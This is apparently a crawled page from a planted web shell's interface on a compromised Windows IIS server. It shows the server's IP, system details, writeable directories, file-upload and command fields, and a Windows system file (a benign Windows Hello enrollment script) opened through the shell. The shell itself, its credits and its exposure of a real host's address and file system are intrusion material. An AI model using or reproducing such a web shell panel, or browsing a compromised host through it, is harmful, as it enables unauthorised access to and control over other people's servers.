403Webshell
Server IP : 209.209.40.120  /  Your IP : 216.73.217.112
Web Server : Microsoft-IIS/10.0
System : Windows NT NEWWWW 10.0 build 17763 (Windows Server 2019) i586
User : NEWWWW$ ( 0)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Windows/SystemApps/Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/Windows/SystemApps/Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy/js/hello.js


"use strict";
var CloudExperienceHost;
(function (CloudExperienceHost) {
    var Hello;
    (function (Hello) {
        var helloEnrollmentManager = null;
        function localizedStrings() {
            var helloResources = {};
            var keyList = [
                'HelloTitleMulti', 'HelloTitleFace', 'HelloTitleFingerprint',
                'HelloMultiListAccessibleName',
                'HelloFaceAnimationAltText',
                'HelloFaceIconAriaLabel', 'HelloFingerprintIconAriaLabel',
                'HelloOptionTitleFace', 'HelloOptionTitleFingerprint',
                'HelloLeadTextFace', 'HelloLeadTextFingerprint',
                'HelloOptionBodyFingerprint',
                'HelloSkipLink',
                'HelloButtonText'];
            var i = 0;
            for (i = 0; i < keyList.length; i++) {
                var resourceId = '/oobeHello/' + keyList[i];
                helloResources[keyList[i]] = WinJS.Resources.getString(resourceId).value;
            }
            return JSON.stringify(helloResources);
        }
        Hello.localizedStrings = localizedStrings;
        function getSupportedHelloEnrollmentKinds() {
            return new WinJS.Promise(function (completeDispatch, errorDispatch) {
                getHelloEnrollmentManager().getSupportedEnrollmentKindsAsync().done(function (winrtKinds) {
                    var supportedKinds = {};
                    supportedKinds.face = (winrtKinds & CloudExperienceHostBroker.Hello.EnrollmentFlags.face);
                    supportedKinds.fingerprint = (winrtKinds & CloudExperienceHostBroker.Hello.EnrollmentFlags.fingerprint);
                    completeDispatch(JSON.stringify(supportedKinds));
                }, function (e) { errorDispatch(e); });
            });
        }
        Hello.getSupportedHelloEnrollmentKinds = getSupportedHelloEnrollmentKinds;
        function startHelloEnrollment(kind, appWindowLocation) {
            var winrtKind;
            if (kind && kind.face) {
                winrtKind = CloudExperienceHostBroker.Hello.EnrollmentFlags.face;
            }
            else if (kind && kind.fingerprint) {
                winrtKind = CloudExperienceHostBroker.Hello.EnrollmentFlags.fingerprint;
            }
            else {
                throw new CloudExperienceHost.InvalidArgumentError("No supported Hello enrollment type provided");
            }
            return new WinJS.Promise(function (completeDispatch, errorDispatch) {
                getHelloEnrollmentManager().showEnrollmentAsync(winrtKind, appWindowLocation).done(function (enrolledSuccessfully) {
                    completeDispatch(enrolledSuccessfully);
                }, function (e) { errorDispatch(e); });
            });
        }
        Hello.startHelloEnrollment = startHelloEnrollment;
        function updateWindowLocation(appWindowLocation) {
            getHelloEnrollmentManager().updateWindowLocation(appWindowLocation);
        }
        Hello.updateWindowLocation = updateWindowLocation;
        function getHelloEnrollmentManager() {
            if (helloEnrollmentManager === null) {
                var userObj = CloudExperienceHost.getIUser();
                helloEnrollmentManager = CloudExperienceHostBroker.Hello.HelloEnrollmentManagerFactory.getHelloEnrollmentManager(userObj);
            }
            return helloEnrollmentManager;
        }
    })(Hello = CloudExperienceHost.Hello || (CloudExperienceHost.Hello = {}));
})(CloudExperienceHost || (CloudExperienceHost = {}));
var CloudExperienceHost;
(function (CloudExperienceHost) {
    var HelloCleanup;
    (function (HelloCleanup) {
        function cleanupHelloEnrollment() {
            return new WinJS.Promise(function (completeDispatch, errorDispatch) {
                var helloEnrollmentManager = new CloudExperienceHostBroker.Hello.HelloEnrollmentManager();
                helloEnrollmentManager.cleanupEnrollmentAsync().done(function () {
                    completeDispatch();
                }, function (e) { errorDispatch(e); });
            });
        }
        HelloCleanup.cleanupHelloEnrollment = cleanupHelloEnrollment;
    })(HelloCleanup = CloudExperienceHost.HelloCleanup || (CloudExperienceHost.HelloCleanup = {}));
})(CloudExperienceHost || (CloudExperienceHost = {}));
//# sourceMappingURL=Hello.js.map

Youez - 2016 - github.com/yon3zu
LinuXploit